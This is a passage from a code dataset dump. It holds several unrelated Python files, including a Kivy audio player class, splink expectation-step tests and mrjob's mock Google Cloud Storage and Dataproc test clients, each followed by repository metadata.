bisa diconvert.\"))\n sys.exit(0)\n\n df_string.columns = df_string.columns.str.upper() # Uppercase all the column name\n return df_string # df_string is DataFrame which contain all data in string format\n else:\n SetParameterAsText(2, output_message(\"Failed\", \"Jenis file harus dalam .xlsx atau .xls\"))\n sys.exit(0)\n", "sub_path": "SMD_Package/event_table/input_excel.py", "file_name": "input_excel.py", "file_ext": "py", "file_size_in_byte": 1923, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_excel", "line_number": 20, "usage_type": "call"}, {"api_name": "arcpy.SetParameterAsText", "line_number": 24, "usage_type": "call"}, {"api_name": "SMD_Package.OutputMessage.output_message", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 25, "usage_type": "call"}, {"api_name": "zipfile.BadZipfile", "line_number": 26, "usage_type": "name"}, {"api_name": "arcpy.SetParameterAsText", "line_number": 27, "usage_type": "call"}, {"api_name": "SMD_Package.OutputMessage.output_message", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 31, "usage_type": "call"}, {"api_name": "arcpy.SetParameterAsText", "line_number": 33, "usage_type": "call"}, {"api_name": "SMD_Package.OutputMessage.output_message", "line_number": 33, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 34, "usage_type": "call"}, {"api_name": "arcpy.SetParameterAsText", "line_number": 39, "usage_type": "call"}, {"api_name": "SMD_Package.OutputMessage.output_message", "line_number": 39, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "88492514", "text": "from kivy.clock import Clock\nfrom kivy.core.audio import SoundLoader\n\n\nclass Player(object):\n \"\"\"\n Base class for audio players that use Kivy SoundLoader.\n \"\"\"\n\n def __init__(self):\n self._volume = 1 # Playback volume, float in the range 0-1.\n self._prev_volume = 1 # Previous volume before mute.\n self._sound = None # Sound object.\n self._pos = 0 # Playback position time (seconds).\n self._length = 0 # Sound length (seconds).\n # Run _on_update every second when triggered.\n self._update_event = Clock.create_trigger(self._on_update, 1, True)\n\n def set_source(self, source):\n \"\"\"\n Set audio source.\n\n Param source str: URL or path to the sound file.\n \"\"\"\n try:\n self._sound = SoundLoader.load(source)\n if self._sound:\n self._sound.bind(on_play=self._on_play)\n self._sound.bind(on_stop=self._on_stop)\n self._sound.volume = self._volume\n self._pos = 0\n self._length = 0\n else:\n self._on_error()\n except Exception:\n self._on_error()\n\n def play(self):\n \"\"\"\n Play the current sound.\n \"\"\"\n if self._sound:\n self._sound.play()\n\n def pause(self):\n \"\"\"\n Pause the current sound.\n \"\"\"\n if self._sound:\n self._pos = self._sound.get_pos()\n try:\n # Some files can't be resumed properly after beign stopped.\n # Try to pause the sound if possible.\n self._sound.player.pause()\n self._sound.state = 'stop'\n except AttributeError:\n self._sound.stop()\n self._update_event.cancel()\n # Run _on_update.\n self._on_update(0)\n\n def stop(self):\n \"\"\"\n Stop the current sound.\n \"\"\"\n if self._sound:\n self._sound.stop()\n\n def seek(self, position):\n \"\"\"\n Seek to the given position.\n\n Param position float|int: Position in seconds.\n \"\"\"\n if self._sound:\n if position < self._length:\n # Most sound providers cannot seek when the sound is stopped.\n was_playing = self.is_playing()\n if not was_playing:\n # Avoid updates.\n self._sound.unbind(on_play=self._on_play)\n self._sound.unbind(on_stop=self._on_stop)\n self._sound.play()\n else:\n # Cancel _update_event.\n self._update_event.cancel()\n self._sound.seek(position)\n if not was_playing:\n self.pause()\n # Resume updates.\n self._sound.bind(on_play=self._on_play)\n self._sound.bind(on_stop=self._on_stop)\n # Run _on_update.\n self._on_update(0)\n else:\n # Start _update_event.\n self._update_event()\n elif self._length:\n self.stop()\n self._on_completed()\n\n def get_position(self):\n \"\"\"\n Get the current position of the sound.\n\n Returns float: Position in seconds.\n \"\"\"\n return self._pos\n\n def get_length(self):\n \"\"\"\n Get the length of the current sound.\n\n Returns float: Length of the sound in seconds.\n \"\"\"\n return self._length\n\n def is_ready(self):\n \"\"\"\n Check if the player has a sound loaded.\n\n Returns bool: True if there is a sound loaded.\n \"\"\"\n return bool(self._sound)\n\n def is_playing(self):\n \"\"\"\n Check if the player is playing a sound.\n\n Returns bool: True if there is a sound being played.\n \"\"\"\n return bool(self._sound) and self._sound.state == 'play'\n\n def set_volume(self, volume):\n \"\"\"\n Set the volume of the player.\n\n Param volume float|int: From 0 to 100.\n \"\"\"\n self._volume = volume / 100.\n if self._volume:\n self._prev_volume = self._volume\n if self._sound:\n self._sound.volume = self._volume\n # Run _on_update.\n self._on_update(0)\n\n def _on_play(self, instance):\n \"\"\"\n Called when the player starts playback.\n\n Param instance Sound: The instance of sound triggering this event.\n \"\"\"\n # Run _on_update.\n self._on_update(0)\n # Start _update_event.\n self._update_event()\n\n def _on_stop(self, instance):\n \"\"\"\n Called when the player stops playback.\n\n Param instance Sound: The instance of sound triggering this event.\n \"\"\"\n pos = self._pos\n length = self._length\n self._sound.unload()\n self._sound = None\n self._pos = 0\n self._length = 0\n self._update_event.cancel()\n # Run _on_update.\n self._on_update(0)\n # Playback position time could have been updated for the last time one\n # second before the sound was stopped.\n if length and pos >= length - 1:\n self._on_completed()\n\n def _on_completed(self):\n \"\"\"\n Called when playback is completed.\n \"\"\"\n pass\n\n def _on_error(self):\n \"\"\"\n Called if there was an error loading a sound.\n \"\"\"\n self.stop()\n\n def _on_update(self, dt):\n \"\"\"\n Called every second during playback.\n\n Param dt float.\n \"\"\"\n if self._sound:\n self._pos = self._sound.get_pos()\n # Sometimes the sound length takes a while to get loaded.\n self._length = max(self._length, self._sound.length)\n\n def get_volume(self):\n \"\"\"\n Returns the current volume of the player.\n\n Returns float: Volume value between 0 and 100.\n \"\"\"\n return self._volume * 100\n\n def mute(self):\n \"\"\"\n Mute the player.\n \"\"\"\n self.set_volume(0)\n\n def unmute(self):\n \"\"\"\n Unmute the player.\n \"\"\"\n self.set_volume(self._prev_volume * 100)\n", "sub_path": "audioplayers/player.py", "file_name": "player.py", "file_ext": "py", "file_size_in_byte": 6265, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "kivy.clock.Clock.create_trigger", "line_number": 17, "usage_type": "call"}, {"api_name": "kivy.clock.Clock", "line_number": 17, "usage_type": "name"}, {"api_name": "kivy.core.audio.SoundLoader.load", "line_number": 26, "usage_type": "call"}, {"api_name": "kivy.core.audio.SoundLoader", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "613760874", "text": "import json\nimport argparse\n\n\ndef get_country_text(filename, country):\n with open(filename) as f:\n for line in f:\n d = json.loads(line)\n if d['title'] == country:\n return d['text']\n\n \ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--filename', default='./data/jawiki-country.json')\n args = parser.parse_args()\n\n text = get_country_text(args.filename, country='イギリス')\n print(text)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "chapter3/_20.py", "file_name": "_20.py", "file_ext": "py", "file_size_in_byte": 530, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "json.loads", "line_number": 8, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "578938451", "text": "import sqlite3\n\nimport pandas as pd\nfrom pandas.util.testing import assert_frame_equal\nimport pytest\n\nfrom splink.gammas import _sql_gen_add_gammas\nfrom splink.settings import sql_gen_case_smnt_strict_equality_2, complete_settings_dict\nfrom splink.expectation_step import _sql_gen_gamma_prob_columns, _sql_gen_expected_match_prob\nfrom splink.params import Params\n\ndef test_probability_columns(sqlite_con_1, gamma_settings_1):\n\n\n params = Params(gamma_settings_1, spark=\"supress_warnings\")\n\n sql = _sql_gen_gamma_prob_columns(params, gamma_settings_1,\"df_gammas1\")\n df = pd.read_sql(sql, sqlite_con_1)\n\n cols_to_keep = [\"prob_gamma_mob_match\", \"prob_gamma_mob_non_match\", \"prob_gamma_surname_match\", \"prob_gamma_surname_non_match\"]\n pd_df_result = df[cols_to_keep][:4]\n\n df_correct = [{\"prob_gamma_mob_match\": 0.9,\n \"prob_gamma_mob_non_match\": 0.2,\n \"prob_gamma_surname_match\": 0.7,\n \"prob_gamma_surname_non_match\": 0.25\n },\n {\"prob_gamma_mob_match\": 0.9,\n \"prob_gamma_mob_non_match\": 0.2,\n \"prob_gamma_surname_match\": 0.2,\n \"prob_gamma_surname_non_match\": 0.25\n },\n {\"prob_gamma_mob_match\": 0.9,\n \"prob_gamma_mob_non_match\": 0.2,\n \"prob_gamma_surname_match\": 0.2,\n \"prob_gamma_surname_non_match\": 0.25\n },\n {\"prob_gamma_mob_match\": 0.1,\n \"prob_gamma_mob_non_match\": 0.8,\n \"prob_gamma_surname_match\": 0.7,\n \"prob_gamma_surname_non_match\": 0.25\n }]\n\n pd_df_correct = pd.DataFrame(df_correct)\n\n assert_frame_equal(pd_df_correct, pd_df_result)\n\ndef test_expected_match_prob(gamma_settings_1, params_1, sqlite_con_1):\n\n df = pd.read_sql(\"select * from df_with_match_probability1\", sqlite_con_1)\n\n\n sql = _sql_gen_expected_match_prob(params_1, gamma_settings_1, \"df_with_gamma_probs1\")\n df = pd.read_sql(sql, sqlite_con_1)\n result_list = list(df[\"match_probability\"])\n\n correct_list = [\n 0.893617021,\n 0.705882353,\n 0.705882353,\n 0.189189189,\n 0.189189189,\n 0.893617021,\n 0.375,\n 0.375]\n\n for i in zip(result_list, correct_list):\n assert i[0] == pytest.approx(i[1])\n\n", "sub_path": "tests/test_expectation.py", "file_name": "test_expectation.py", "file_ext": "py", "file_size_in_byte": 2103, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "splink.params.Params", "line_number": 15, "usage_type": "call"}, {"api_name": "splink.expectation_step._sql_gen_gamma_prob_columns", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 44, "usage_type": "call"}, {"api_name": "pandas.util.testing.assert_frame_equal", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 50, "usage_type": "call"}, {"api_name": "splink.expectation_step._sql_gen_expected_match_prob", "line_number": 53, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 54, "usage_type": "call"}, {"api_name": "pytest.approx", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "618907588", "text": "# Copyright 2009-2016 Yelp and Contributors\n# Copyright 2017 Yelp\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport re\nimport collections\nimport copy\nimport time\nimport hashlib\nimport sys\nfrom datetime import datetime\nfrom httplib2 import Response\nfrom io import BytesIO\nfrom unittest import skipIf\n\ntry:\n from oauth2client.client import GoogleCredentials\n from googleapiclient import discovery\n from googleapiclient import errors as google_errors\n from googleapiclient import http as google_http\nexcept ImportError:\n # don't require googleapiclient; MRJobs don't actually need it when running\n # inside hadoop streaming\n GoogleCredentials = None\n discovery = None\n google_errors = None\n google_http = None\n\nfrom mrjob.dataproc import DataprocJobRunner\nfrom mrjob.dataproc import _DATAPROC_API_REGION\nfrom mrjob.fs.gcs import GCSFilesystem\nfrom mrjob.fs.gcs import parse_gcs_uri\nfrom mrjob.fs.gcs import _hex_to_base64\nfrom mrjob.fs.gcs import _LS_FIELDS_TO_RETURN\n\nfrom tests.mr_two_step_job import MRTwoStepJob\nfrom tests.py2 import patch\nfrom tests.py2 import mock\nfrom tests.sandbox import SandboxedTestCase\n\n# list_clusters() only returns this many results at a time\nDEFAULT_MAX_CLUSTERS_RETURNED = 50\n_TEST_PROJECT = 'test-mrjob:test-project'\n\n_GCLOUD_CONFIG = {\n 'compute.region': 'us-central1',\n 'compute.zone': 'us-central1-b',\n 'core.account': 'no@where.com',\n 'core.disable_usage_reporting': 'False',\n 'core.project': _TEST_PROJECT\n}\n\n\ndef mock_api(fxn):\n def req_wrapper(*args, **kwargs):\n actual_resp = fxn(*args, **kwargs)\n\n mocked_req = mock.MagicMock(google_http.HttpRequest)\n mocked_req.execute.return_value = actual_resp\n\n return mocked_req\n\n return req_wrapper\n\n\ndef mock_google_error(status):\n mock_resp = mock.Mock(spec=Response)\n mock_resp.status = status\n return google_errors.HttpError(mock_resp, b'')\n\n\n# Addressable data structure specific\ndef _get_deep(data_structure, dot_path_or_list, default_value=None):\n \"\"\"Attempts access nested data structures and not blow up on a gross key\n error\n\n {\n \"hello\": {\n \"hi\": 5\n }\n }\n \"\"\"\n search_path = None\n\n param_type = type(dot_path_or_list)\n if param_type in (tuple, list):\n search_path = dot_path_or_list\n elif param_type == str:\n search_path = dot_path_or_list.split('.')\n\n assert len(search_path) > 0, \"Missing valid search path\"\n\n try:\n current_item = data_structure\n for search_key in search_path:\n current_item = current_item[search_key]\n except (KeyError, IndexError, TypeError):\n return default_value\n\n return current_item\n\n\ndef _set_deep(data_structure, dot_path_or_list, value_to_set):\n \"\"\"Attempts access nested data structures and not blow up on a gross key\n error.\n\n {\n \"hello\": {\n \"hi\": 5\n }\n }\n \"\"\"\n assert hasattr(data_structure, '__setitem__')\n search_path = None\n\n param_type = type(dot_path_or_list)\n if param_type in (tuple, list):\n search_path = dot_path_or_list\n elif param_type == str:\n search_path = dot_path_or_list.split('.')\n\n assert len(search_path) > 0, \"Missing valid search path\"\n\n current_item = data_structure\n for search_key in search_path[:-1]:\n current_item.setdefault(search_key, dict())\n current_item = current_item[search_key]\n\n current_item[search_path[-1]] = value_to_set\n return data_structure\n\n\ndef _dict_deep_update(d, u):\n \"\"\"from http://stackoverflow.com/questions/3232943/update-value-of-a-nested-dictionary-of-varying-depth \"\"\" # noqa\n for k, v in u.items():\n if isinstance(v, collections.Mapping):\n r = _dict_deep_update(d.get(k, {}), v)\n d[k] = r\n else:\n d[k] = u[k]\n return d\n\n\n### Test Case ###\n\n# disable these tests until we figure out a way to get the google API client\n# to play well with PyPy 3 (which reports itself as Python 3.2, but has key\n# Python 3.3 features)\n@skipIf(\n hasattr(sys, 'pypy_version_info') and (3, 0) <= sys.version_info < (3, 3),\n \"googleapiclient doesn't work with PyPy 3\")\nclass MockGoogleAPITestCase(SandboxedTestCase):\n\n def setUp(self):\n self._dataproc_client = MockDataprocClient(self)\n self._gcs_client = MockGCSClient(self)\n self._gcs_fs = self._gcs_client._fs\n\n self.start(patch.object(\n DataprocJobRunner, 'api_client', self._dataproc_client))\n\n self.gcs_patch_api_client = patch.object(\n GCSFilesystem, 'api_client', self._gcs_client)\n self.gcs_patch_download_io = patch.object(\n GCSFilesystem, '_download_io', self._gcs_client.download_io)\n self.gcs_patch_upload_io = patch.object(\n GCSFilesystem, '_upload_io', self._gcs_client.upload_io)\n self.start(self.gcs_patch_api_client)\n self.start(self.gcs_patch_download_io)\n self.start(self.gcs_patch_upload_io)\n\n self.start(patch('mrjob.dataproc._read_gcloud_config',\n lambda: _GCLOUD_CONFIG))\n\n super(MockGoogleAPITestCase, self).setUp()\n\n # patch slow things\n self.mrjob_zip_path = None\n\n def fake_create_mrjob_zip(runner, *args, **kwargs):\n if not self.mrjob_zip_path:\n self.mrjob_zip_path = self.makefile('fake_mrjob.zip')\n\n runner._mrjob_zip_path = self.mrjob_zip_path\n return self.mrjob_zip_path\n\n self.start(patch.object(\n DataprocJobRunner, '_create_mrjob_zip',\n fake_create_mrjob_zip))\n\n self.start(patch.object(time, 'sleep'))\n\n def make_runner(self, *args):\n \"\"\"create a dummy job, and call make_runner() on it.\n Use this in a with block:\n\n with self.make_runner() as runner:\n ...\n \"\"\"\n stdin = BytesIO(b'foo\\nbar\\n')\n mr_job = MRTwoStepJob(['-r', 'dataproc'] + list(args))\n mr_job.sandbox(stdin=stdin)\n\n return mr_job.make_runner()\n\n def put_gcs_multi(self, gcs_uri_to_data_map):\n \"\"\"Convenience method\"\"\"\n self._gcs_client.put_gcs_multi(gcs_uri_to_data_map)\n\n def put_job_output_parts(self, dataproc_runner, raw_parts):\n assert type(raw_parts) is list\n\n base_uri = dataproc_runner.get_output_dir()\n gcs_multi_dict = dict()\n for part_num, part_data in enumerate(raw_parts):\n gcs_uri = base_uri + 'part-%05d' % part_num\n gcs_multi_dict[gcs_uri] = part_data\n\n self.put_gcs_multi(gcs_multi_dict)\n\n def get_cluster_from_runner(self, runner, cluster_id):\n cluster = runner.api_client.clusters().get(\n projectId=_TEST_PROJECT,\n region=_DATAPROC_API_REGION,\n clusterName=cluster_id,\n ).execute()\n return cluster\n\n############################# BEGIN BEGIN BEGIN ###############################\n########################### GCS Client - OVERALL ##############################\n############################# BEGIN BEGIN BEGIN ###############################\n\n\nclass MockGCSClient(object):\n \"\"\"Mock out GCSClient...\n\n TARGET API VERSION - Storage API v1\n\n Emulates GCS metadata and stores raw bytes\n Contains convenience functions for initializing items in GCS\n \"\"\"\n\n def __init__(self, test_case):\n assert isinstance(test_case, MockGoogleAPITestCase)\n self._test_case = test_case\n self._fs = GCSFilesystem()\n\n self._cache_objects = dict()\n self._cache_buckets = dict()\n\n self._client_objects = MockGCSClientObjects(self)\n self._client_buckets = MockGCSClientBuckets(self)\n\n def objects(self):\n return self._client_objects\n\n def buckets(self):\n return self._client_buckets\n\n def put_gcs(self, gcs_uri, data):\n \"\"\"Put data at gcs_uri, creating a bucket if necessary\"\"\"\n bucket, name = parse_gcs_uri(gcs_uri)\n\n try:\n self._fs.get_bucket(bucket)\n except google_errors.HttpError:\n self._fs.create_bucket(project=_TEST_PROJECT, name=bucket)\n\n bytes_io_obj = BytesIO(data)\n self.upload_io(bytes_io_obj, gcs_uri)\n\n def put_gcs_multi(self, gcs_uri_to_data_map):\n \"\"\"Bulk put data at gcs_uris\"\"\"\n for gcs_uri, data in gcs_uri_to_data_map.items():\n self.put_gcs(gcs_uri, data)\n\n def download_io(self, src_uri, io_obj):\n \"\"\"\n Clobber GCSFilesystem._download_io\n \"\"\"\n bucket, name = parse_gcs_uri(src_uri)\n\n object_dict = _get_deep(self._cache_objects, [bucket, name])\n\n if not object_dict:\n raise Exception\n\n object_data = object_dict['_data']\n io_obj.write(object_data)\n return io_obj\n\n def upload_io(self, io_obj, dest_uri):\n \"\"\"\n Clobber GCSFilesystem._upload_io\n \"\"\"\n bucket, name = parse_gcs_uri(dest_uri)\n\n assert bucket in self._cache_buckets\n\n io_obj.seek(0)\n\n data = io_obj.read()\n\n # TODO - io_obj.close() ? Not sure if callers of this function would\n # expect their io_objs to be closed\n\n object_resp = _insert_object_resp(bucket=bucket, name=name, data=data)\n\n _set_deep(self._cache_objects, [bucket, name], object_resp)\n\n return object_resp\n\n\nclass MockGCSClientObjects(object):\n def __init__(self, client):\n assert isinstance(client, MockGCSClient)\n self._client = client\n self._objects = self._client._cache_objects\n\n @mock_api\n def list(self, **kwargs):\n \"\"\"Emulate objects().list - fields supported - bucket, prefix, fields\n \"\"\"\n bucket = kwargs.get('bucket')\n prefix = kwargs.get('prefix') or ''\n fields = kwargs.get('fields') or _LS_FIELDS_TO_RETURN\n assert bucket is not None\n\n # Return only the fields that were requested\n field_match = re.findall('items\\((.*?)\\)', fields)[0]\n actual_fields = set(field_match.split(','))\n\n object_map = _get_deep(self._objects, [bucket], dict())\n\n item_list = []\n for object_name, current_object in object_map.items():\n # Filter out on prefix match\n if not object_name.startswith(prefix):\n continue\n\n # Copy output fields for the requestor\n output_item = dict()\n for current_field in actual_fields:\n output_item[current_field] = current_object[current_field]\n\n item_list.append(output_item)\n\n return dict(items=item_list, kwargs=kwargs)\n\n def list_next(self, list_request, resp):\n \"\"\"list always returns all results in a single shot\"\"\"\n return None\n\n @mock_api\n def delete(self, bucket=None, object=None):\n bucket_dict = self._objects[bucket]\n del bucket_dict[object]\n\n @mock_api\n def get_media(self, bucket=None, object=None):\n raise NotImplementedError('See MockGCSClient.download_io')\n\n @mock_api\n def insert(self, bucket=None, name=None, media_body=None):\n raise NotImplementedError('See MockGCSClient.upload_io')\n\n\nclass MockGCSClientBuckets(object):\n def __init__(self, client):\n assert isinstance(client, MockGCSClient)\n self._client = client\n self._buckets = self._client._cache_buckets\n\n @mock_api\n def list(self, **kwargs):\n \"\"\"Emulate buckets().list - fields supported - project, prefix\"\"\"\n project = kwargs.get('project')\n prefix = kwargs.get('prefix') or ''\n\n item_list = []\n for bucket_name, current_bucket in self._buckets.items():\n if not bucket_name.startswith(prefix):\n continue\n\n if project and project != current_bucket['_projectName']:\n continue\n\n item_list.append(current_bucket)\n\n return dict(items=item_list, kwargs=kwargs)\n\n @mock_api\n def get(self, bucket=None):\n try:\n return self._buckets[bucket]\n except KeyError:\n raise mock_google_error(404)\n\n @mock_api\n def delete(self, bucket=None):\n del self._buckets[bucket]\n\n @mock_api\n def insert(self, project=None, body=None):\n assert project is not None\n body = body or dict()\n\n bucket_name = body['name']\n assert bucket_name not in self._buckets\n\n # Create an empty cluster\n bucket = _make_bucket_resp(project=project)\n\n # Then do a deep-update as to what was requested\n bucket = _dict_deep_update(bucket, body)\n\n self._buckets[bucket_name] = bucket\n\n return bucket\n\n\ndef _insert_object_resp(bucket=None, name=None, data=None):\n \"\"\"Fake GCS object metadata\"\"\"\n assert type(data) is bytes\n\n hasher = hashlib.md5()\n hasher.update(data)\n md5_hex_hash = hasher.hexdigest()\n\n return {\n u'bucket': bucket,\n u'name': name,\n u'md5Hash': _hex_to_base64(md5_hex_hash),\n u'timeCreated': _datetime_to_gcptime(),\n u'size': str(len(data)),\n u'_data': data\n }\n\n\ndef _make_bucket_resp(project=None, now=None):\n \"\"\"Fake GCS bucket metadata\"\"\"\n now_time = _datetime_to_gcptime(now)\n\n return {\n u'etag': u'CAE=',\n u'kind': u'storage#bucket',\n u'location': u'US',\n u'metageneration': u'1',\n u'owner': {u'entity': u'project-owners-1234567890'},\n u'projectNumber': u'1234567890',\n u'storageClass': u'STANDARD',\n u'timeCreated': now_time,\n u'updated': now_time,\n u'_projectName': project\n }\n\n############################# END END END ###############################\n########################### GCS Client - OVERALL ##############################\n############################# END END END ###############################\n\n\n############################# BEGIN BEGIN BEGIN ###############################\n######################### Dataproc Client - OVERALL ###########################\n############################# BEGIN BEGIN BEGIN ###############################\nclass MockDataprocClient(object):\n \"\"\"Mock out DataprocJobRunner.api_client...\n\n TARGET API VERSION - Dataproc API v1\n\n Emulates Dataproc cluster / job metadata\n Convenience functions for cluster/job state and updating\n \"\"\"\n\n def __init__(self, test_case):\n assert isinstance(test_case, MockGoogleAPITestCase)\n self._test_case = test_case\n\n self._cache_clusters = {}\n self._cache_jobs = {}\n\n self._client_clusters = MockDataprocClientClusters(self)\n self._client_jobs = MockDataprocClientJobs(self)\n\n # By default - we always resolve our infinite loops by default to\n # state RUNNING / DONE\n self.cluster_get_advances_states = collections.deque(['RUNNING'])\n self.job_get_advances_states = collections.deque(\n ['SETUP_DONE', 'RUNNING', 'DONE'])\n\n def clusters(self):\n return self._client_clusters\n\n def jobs(self):\n return self._client_jobs\n\n def cluster_create(self, project=None, cluster=None):\n cluster_body = _create_cluster_resp(project=project, cluster=cluster)\n cluster_resp = self._client_clusters.create(\n projectId=cluster_body['projectId'],\n region=_DATAPROC_API_REGION,\n body=cluster_body).execute()\n return cluster_resp\n\n def get_state(self, cluster_or_job):\n return cluster_or_job['status']['state']\n\n def update_state(self, cluster_or_job, state=None, prev_state=None):\n old_state = cluster_or_job['status']['state']\n if prev_state:\n assert old_state == prev_state\n\n if old_state == state:\n return cluster_or_job\n\n new_status = {\n \"state\": state,\n \"stateStartTime\": _datetime_to_gcptime()\n }\n\n old_status = cluster_or_job.pop('status')\n cluster_or_job['status'] = new_status\n\n cluster_or_job.setdefault('statusHistory', [])\n cluster_or_job['statusHistory'].append(old_status)\n\n return cluster_or_job\n############################# END END END ###############################\n######################### Dataproc Client - OVERALL ###########################\n############################# END END END ###############################\n\n\n############################# BEGIN BEGIN BEGIN ###############################\n######################### Dataproc Client - Clusters ##########################\n############################# BEGIN BEGIN BEGIN ###############################\n\n_DATAPROC_CLUSTER = 'test-cluster-test'\n_CLUSTER_REGION = _DATAPROC_API_REGION\n_CLUSTER_ZONE = None\n_CLUSTER_IMAGE_VERSION = '1.0'\n_CLUSTER_STATE = ''\n_CLUSTER_MACHINE_TYPE = 'n1-standard-1'\n_CLUSTER_NUM_CORE_INSTANCESS = 2\n\n\ndef _datetime_to_gcptime(in_datetime=None):\n in_datetime = in_datetime or datetime.utcnow()\n return in_datetime.isoformat() + 'Z'\n\n\ndef _create_cluster_resp(\n project=None, zone=None, cluster=None, image_version=None,\n machine_type=None, machine_type_master=None, num_core_instancess=None,\n now=None):\n \"\"\"Fake Dataproc Cluster metadata\"\"\"\n project = project or _TEST_PROJECT\n zone = zone or _CLUSTER_ZONE\n cluster = cluster or _DATAPROC_CLUSTER\n image_version = image_version or _CLUSTER_IMAGE_VERSION\n machine_type_master = machine_type_master or _CLUSTER_MACHINE_TYPE\n machine_type = machine_type or _CLUSTER_MACHINE_TYPE\n num_core_instancess = num_core_instancess or _CLUSTER_NUM_CORE_INSTANCESS\n\n gce_cluster_conf = {\n \"zoneUri\": (\n \"https://www.googleapis.com/compute/v1/projects/%(project)s/\"\n \"zones/%(zone)s\" % locals()),\n \"networkUri\": (\n \"https://www.googleapis.com/compute/v1/projects/%(project)s/\"\n \"global/networks/default\" % locals()),\n \"serviceAccountScopes\": [\n \"https://www.googleapis.com/auth/bigquery\",\n \"https://www.googleapis.com/auth/bigtable.admin.table\",\n \"https://www.googleapis.com/auth/bigtable.data\",\n \"https://www.googleapis.com/auth/cloud.useraccounts.readonly\",\n \"https://www.googleapis.com/auth/devstorage.full_control\",\n \"https://www.googleapis.com/auth/devstorage.read_write\",\n \"https://www.googleapis.com/auth/logging.write\"\n ],\n }\n\n master_conf = {\n \"numInstances\": 1,\n \"instanceNames\": [\n \"%(cluster)s-m\" % locals()\n ],\n \"imageUri\": (\n \"https://www.googleapis.com/compute/v1/projects/cloud-dataproc/\"\n \"global/images/dataproc-1-0-20160302-200123\"),\n \"machineTypeUri\": (\n \"https://www.googleapis.com/compute/v1/projects/%(project)s/\"\n \"zones/%(zone)s/machineTypes/%(machine_type_master)s\" % locals()),\n \"diskConfig\": {\n \"bootDiskSizeGb\": 500\n },\n }\n\n worker_conf = {\n \"numInstances\": num_core_instancess,\n \"instanceNames\": [\n '%s-w-%d' % (cluster, num) for num in range(num_core_instancess)],\n \"imageUri\": (\n \"https://www.googleapis.com/compute/v1/projects/cloud-dataproc/\"\n \"global/images/dataproc-1-0-20160302-200123\"),\n \"machineTypeUri\": (\n \"https://www.googleapis.com/compute/v1/projects/%(project)s/\"\n \"zones/%(zone)s/machineTypes/%(machine_type)s\" % locals()),\n \"diskConfig\": {\n \"bootDiskSizeGb\": 500\n }\n }\n\n software_conf = {\n \"imageVersion\": image_version,\n \"properties\": {\n \"yarn:yarn.nodemanager.resource.memory-mb\": \"3072\",\n \"yarn:yarn.scheduler.minimum-allocation-mb\": \"256\",\n \"yarn:yarn.scheduler.maximum-allocation-mb\": \"3072\",\n \"mapred:mapreduce.map.memory.mb\": \"3072\",\n \"mapred:mapreduce.map.java.opts\": \"-Xmx2457m\",\n \"mapred:mapreduce.map.cpu.vcores\": \"1\",\n \"mapred:mapreduce.reduce.memory.mb\": \"3072\",\n \"mapred:mapreduce.reduce.java.opts\": \"-Xmx2457m\",\n \"mapred:mapreduce.reduce.cpu.vcores\": \"1\",\n \"mapred:yarn.app.mapreduce.am.resource.mb\": \"3072\",\n \"mapred:yarn.app.mapreduce.am.command-opts\": \"-Xmx2457m\",\n \"mapred:yarn.app.mapreduce.am.resource.cpu-vcores\": \"1\",\n \"distcp:mapreduce.map.memory.mb\": \"3072\",\n \"distcp:mapreduce.reduce.memory.mb\": \"3072\",\n \"distcp:mapreduce.map.java.opts\": \"-Xmx2457m\",\n \"distcp:mapreduce.reduce.java.opts\": \"-Xmx2457m\",\n \"spark:spark.executor.cores\": \"1\",\n \"spark:spark.executor.memory\": \"1152m\",\n \"spark:spark.yarn.executor.memoryOverhead\": \"384\",\n \"spark:spark.yarn.am.memory\": \"1152m\",\n \"spark:spark.yarn.am.memoryOverhead\": \"384\",\n \"spark:spark.driver.memory\": \"960m\",\n \"spark:spark.driver.maxResultSize\": \"480m\"\n }\n }\n\n mock_response = {\n \"projectId\": project,\n \"clusterName\": cluster,\n \"config\": {\n \"configBucket\": \"dataproc-801485be-0997-40e7-84a7-00926031747c-us\",\n \"gceClusterConfig\": gce_cluster_conf,\n \"masterConfig\": master_conf,\n \"workerConfig\": worker_conf,\n \"softwareConfig\": software_conf\n },\n \"status\": {\n \"state\": \"CREATING\",\n \"stateStartTime\": _datetime_to_gcptime(now)\n },\n \"clusterUuid\": \"adb4dc59-d109-4af9-badb-0d8e17e028e1\"\n }\n return mock_response\n\n\nclass MockDataprocClientClusters(object):\n def __init__(self, client):\n assert isinstance(client, MockDataprocClient)\n self._client = client\n self._clusters = self._client._cache_clusters\n\n @mock_api\n def create(self, projectId=None, region=None, body=None):\n assert projectId is not None\n assert region == _DATAPROC_API_REGION\n\n body = body or dict()\n\n cluster_name = body['clusterName']\n\n existing_cluster = _get_deep(self._clusters, [projectId, cluster_name])\n assert not existing_cluster\n\n # Create an empty cluster\n cluster = _create_cluster_resp()\n\n # Then do a deep-update as 